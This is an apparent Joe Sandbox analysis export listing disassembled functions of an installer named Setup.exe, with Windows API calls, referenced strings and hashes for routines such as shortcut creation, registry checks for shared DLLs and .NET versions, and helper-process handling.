String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
API String ID: 971782779-3668018701
Opcode ID: 6ac56c40dede855880e8ad846f9cf078f66ca49bc3867743a9702007109289be
Instruction ID: 2c76df8ba625d9f67a49e4dde8e83c51fb287a1c504e4bc7131b70b5a5e3fea9
Opcode Fuzzy Hash: 6ac56c40dede855880e8ad846f9cf078f66ca49bc3867743a9702007109289be
Instruction Fuzzy Hash: B3D13374A001499FDB11EFA9D981BDEB7F5AF08304F50806AF904B7392C778AE45CB69

Function 00455A90 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 263comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D93), ref: 00455AD2
CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D93), ref: 00455AF8
SysFreeString.OLEAUT32(?), ref: 00455C4B
SysFreeString.OLEAUT32(00000000), ref: 00455D49

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

Strings

IPropertyStore::Commit, xrefs: 00455C9B
IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 00455BE1
IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00455CBC
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00455C82
IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00455C30
CoCreateInstance, xrefs: 00455B03
IPersistFile::Save, xrefs: 00455D1A

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: String$CreateFreeInstance$AllocByteCharMultiWide
String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
API String ID: 2079434299-2511345603
Opcode ID: 74038fc2ce87d96f99934e8eb1d8c44aaf3c30d20ab92f5bdae0e1961bd741ba
Instruction ID: 1ba477fb5a9fae82deb3afc91edd2ec405a110a972655544307702cdde238be2
Opcode Fuzzy Hash: 74038fc2ce87d96f99934e8eb1d8c44aaf3c30d20ab92f5bdae0e1961bd741ba
Instruction Fuzzy Hash: 19A16171A00604AFDB41DFA9C895BAE77F8EF09305F144066F904E7262DB78DD48CB69

Function 00453DA0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,?,00000000,?,00000000,00454039,?,0045A38A,00000003,00000000,00000000,00454070), ref: 00453EB9

Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,00000000,?,00000004,00000000,00453F83,?,0045A38A,00000000,00000000,?,00000000,?,00000000), ref: 00453F3D
RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,00000000,?,00000004,00000000,00453F83,?,0045A38A,00000000,00000000,?,00000000,?,00000000), ref: 00453F6C

Strings

, xrefs: 00453E2A
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DD7
RegOpenKeyEx, xrefs: 00453E3C
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E10

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: 057c8d8c772ed5b111fe0de45ed8ede99eaa361ca259bd136f6592954b715877
Instruction ID: a80e1c39b7be5a0450aefd5b2d64ed399e87e9650e944d0b03df369acb03390b
Opcode Fuzzy Hash: 057c8d8c772ed5b111fe0de45ed8ede99eaa361ca259bd136f6592954b715877
Instruction Fuzzy Hash: DF912371E04208ABDB11DF95D942BDFB7F8EB48746F10406BF900F7282D6789E498B69

Function 00458C78 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00458B84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458CC1,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458BD1

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458D1F
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458D89

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458DF0

Strings

SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458CD2
v1.1.4322, xrefs: 00458DE2
.NET Framework version %s not found, xrefs: 00458E29
v2.0.50727, xrefs: 00458D7B
.NET Framework not found, xrefs: 00458E3D
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458DA3
v4.0.30319, xrefs: 00458D11
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458D3C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Close$Open
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 2976201327-446240816
Opcode ID: 763471a3c42020f82195b7b2f00a7a4a1a2398989899a3b581c6ddf3a20ec531
Instruction ID: 65063e084591066ce2e0c419d93be5946fd3b49884627cc027c606e1205e1d1a
Opcode Fuzzy Hash: 763471a3c42020f82195b7b2f00a7a4a1a2398989899a3b581c6ddf3a20ec531
Instruction Fuzzy Hash: 3051D331B041485BCB00DB65C861BEE77B6DB99305F14447FE841EB393DE399A0E8B59

Function 00458264 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 69sleepsynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0045829B
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004582B7
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004582C5
GetExitCodeProcess.KERNEL32(?), ref: 004582D6
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045831D
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458339

Strings

Helper process exited., xrefs: 004582E5
Helper process exited with failure code: 0x%x, xrefs: 00458303
Helper isn't responding; killing it., xrefs: 004582A7
Helper process exited, but failed to get exit code., xrefs: 0045830F
Stopping 64-bit helper process. (PID: %u), xrefs: 0045828D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: 2d7fd7e5987b10d524f02c472a57efb930829ceec880823ff2509f820562e96d
Instruction ID: 8fe12dd4885d681891ac841caaa50731cfa294a2646cec7fde82df5e564d92ee
Opcode Fuzzy Hash: 2d7fd7e5987b10d524f02c472a57efb930829ceec880823ff2509f820562e96d
Instruction Fuzzy Hash: 3F2141706047409AC720E7B9C44675B76D4AF48B05F048C6FFC99E7693DE79E8488B2A

Function 00453A54 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C2B,?,00000000,00453CEF), ref: 00453B7B
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C2B,?,00000000,00453CEF), ref: 00453CB7

Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

Strings

, xrefs: 00453ADD
RegCreateKeyEx, xrefs: 00453AEF
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AC3
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A93

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2481121983-1280779767
Opcode ID: 5bc81dfaf656a7678e964c132ab2b34ccd4f70bb9b16d95aa5103fd9dc38918c
Instruction ID: 0ff8758d0f3d0f8af8441e1c96d3f3007b0bafa02c42e47a0c64eaf9a54c5f26
Opcode Fuzzy Hash: 5bc81dfaf656a7678e964c132ab2b34ccd4f70bb9b16d95aa5103fd9dc38918c
Instruction Fuzzy Hash: 31810076A00209AFDB01DFD5C941BDEB7B9EB48345F50442AF901F7282D778AA09CB69

Function 004952B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00452F2C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045301B
Part of subcall function 00452F2C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045302B

CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049532D
SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00495481), ref: 0049534E
CreateWindowExA.USER32(00000000,STATIC,00495490,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495375
SetWindowLongA.USER32(?,000000FC,00494B08), ref: 00495388
SetWindowPos.USER32(0001041A,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000,STATIC,00495490), ref: 004953B8
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049542C
CloseHandle.KERNEL32(?,?,0001041A,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000), ref: 00495438

Part of subcall function 0045327C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453363

73A25CF0.USER32(?,0049545B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000,STATIC), ref: 0049544E

Strings

/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 004953E7
STATIC, xrefs: 0049536E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 170458502-2312673372
Opcode ID: bd3b1a3ea361180e9453a92b65966344b951975460375a691f19474c026398ee
Instruction ID: 8708ddcb3c7e509e39ae52b682c63ff85e573034b813b33c283b53b7944ce28b
Opcode Fuzzy Hash: bd3b1a3ea361180e9453a92b65966344b951975460375a691f19474c026398ee
Instruction Fuzzy Hash: 32415470A40604AFDF01EBA5DC42F9E7BF8EB09704F614576F500FB292D6799E008BA8

Function 0047BAC0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,SHGetFolderPathA), ref: 0047BBC2

Strings

Failed to load DLL "%s", xrefs: 0047BBA5
shell32.dll, xrefs: 0047BB6D
n_I, xrefs: 0047BB09, 0047BB4E, 0047BB36, 0047BB3E
Failed to get address of SHGetFolderPath function, xrefs: 0047BBD3
shfolder.dll, xrefs: 0047BB25, 0047BB5E
SHGetFolderPathA, xrefs: 0047BBB7
Failed to get version numbers of _shfoldr.dll, xrefs: 0047BB18
_isetup\_shfoldr.dll, xrefs: 0047BAF2
SHFOLDERDLL, xrefs: 0047BAFF

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$n_I$shell32.dll$shfolder.dll
API String ID: 190572456-1193724077
Opcode ID: 9478da251c59a7b71a1c0bf6fb72b29d975c3e60df0ec1b1b0ea057b20b147c8
Instruction ID: f7ce2b1eafdc37c3bb537123c7076bcfbe421214df57355c4a23a81ac9a414e3
Opcode Fuzzy Hash: 9478da251c59a7b71a1c0bf6fb72b29d975c3e60df0ec1b1b0ea057b20b147c8
Instruction Fuzzy Hash: 60310B70A00209DFDB11EB95D982ADEB7B4EB44304F60C46BE804E7755DB38AE058BA9

Function 0042E340 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,?,0047CDF8,00000000), ref: 0042E369
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,?,0047CDF8,00000000), ref: 0042E3BD

Strings

Locale, xrefs: 0042E3AC
kernel32.dll, xrefs: 0042E364
Control Panel\Desktop\ResourceLocale, xrefs: 0042E3CC
GetUserDefaultUILanguage, xrefs: 0042E35F
}VE, xrefs: 0042E3FF, 0042E407, 0042E412, 0042E434
.DEFAULT\Control Panel\International, xrefs: 0042E394

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$}VE
API String ID: 4190037839-505153273
Opcode ID: 873e4c853bdbbccdf0af3ca8c71f52424c26fa88d30fe6339db7093f7235a558
Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
Opcode Fuzzy Hash: 873e4c853bdbbccdf0af3ca8c71f52424c26fa88d30fe6339db7093f7235a558
Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59

Function 00462218 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00462224
GetModuleHandleA.KERNEL32(user32.dll), ref: 00462238
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462245
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462252
GetWindowRect.USER32(0001041A,00000000), ref: 0046229E
SetWindowPos.USER32(0001041A,00000000,?,?,00000000,00000000,0000001D,0001041A,00000000), ref: 004622DC

Strings

(, xrefs: 0046227D
MonitorFromWindow, xrefs: 0046223F
GetMonitorInfoA, xrefs: 0046224C
user32.dll, xrefs: 00462233

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: f998be466f85fc2cd5afa1db2027153a678c287175696d30fe54119a7551bbfa
Instruction ID: 76099a4312c52d0ccda9152c7cb495629c71abad9852ec9ac162fd6c7ff83c4b
Opcode Fuzzy Hash: f998be466f85fc2cd5afa1db2027153a678c287175696d30fe54119a7551bbfa
Instruction Fuzzy Hash: BF21D775701B046BD310D664CD51F3B3395EB84714F08456AF984DB392EAB8DC008B9E

Function 0042EFFC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042F008
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
GetWindowRect.USER32(0001041A,00000000), ref: 0042F082
SetWindowPos.USER32(0001041A,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0

Strings

MonitorFromWindow, xrefs: 0042F023
GetMonitorInfoA, xrefs: 0042F030
user32.dll, xrefs: 0042F017
(, xrefs: 0042F061

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: 1f3d01a12b70e2f2efd22dee37096c16042899b8c4cfb8c0d73012da4497e44a
Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
Opcode Fuzzy Hash: 1f3d01a12b70e2f2efd22dee37096c16042899b8c4cfb8c0d73012da4497e44a
Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99

Function 0045843C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045861B,?,00000000,0045867E,?,?,00000000,00000000), ref: 00458499
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,004585B0,?,00000000,00000001,00000000,00000000,00000000,0045861B), ref: 004584F6
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,004585B0,?,00000000,00000001,00000000,00000000,00000000,0045861B), ref: 00458503
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045854F
GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458589,?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,004585B0,?,00000000), ref: 00458575
GetLastError.KERNEL32(?,?,00000000,00000001,00458589,?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,004585B0,?,00000000), ref: 0045857C

Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F

Strings

TransactNamedPipe, xrefs: 0045850F
CreateEvent, xrefs: 004584A7

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: a406e2d9b3e762ca2fe2dc4143740ba3c4ac124267865c3123624ba4f39d1c4b
Instruction ID: 833dc3b8b07b8aac3dc6316824f20e9e6236f4ec1b001489005bcbcce005ffc2
Opcode Fuzzy Hash: a406e2d9b3e762ca2fe2dc4143740ba3c4ac124267865c3123624ba4f39d1c4b
Instruction Fuzzy Hash: ED418375A00608FFDB15DF95C981F9EB7F8EB48714F10406AF904E7292DA78DE44CA68

Function 00456018 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045617D,?,?,00000031,?), ref: 00456040
GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456046
LoadTypeLib.OLEAUT32(00000000,?), ref: 00456093

Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F

Strings

LoadTypeLib, xrefs: 0045609E
ITypeLib::GetLibAttr, xrefs: 004560C9
GetProcAddress, xrefs: 00456053
UnRegisterTypeLib, xrefs: 004560FF
UnRegisterTypeLib, xrefs: 00456036
OLEAUT32.DLL, xrefs: 0045603B

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: 9fa5bcadf1dc093d0a122812024ea5c0a368c4170293a201b9ec292d052efd03
Instruction ID: fd543e9f45e6c9c7d3ae9c39d990c3b16e81fcc474a24b8266df5fe5801867fa
Opcode Fuzzy Hash: 9fa5bcadf1dc093d0a122812024ea5c0a368c4170293a201b9ec292d052efd03
Instruction Fuzzy Hash: 8E319471A00A04AFDB01EFAACD51D6BB7BAEB89B117528466F804D3653DA38DD04C768

Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(?,?), ref: 00416E23
SaveDC.GDI32(?), ref: 00416E37
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
RestoreDC.GDI32(?,?), ref: 00416E75
CreateSolidBrush.GDI32(00000000), ref: 00416EF5
FrameRect.USER32(?,?,?), ref: 00416F28
DeleteObject.GDI32(?), ref: 00416F32
CreateSolidBrush.GDI32(00000000), ref: 00416F42
FrameRect.USER32(?,?,?), ref: 00416F75
DeleteObject.GDI32(?), ref: 00416F7F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
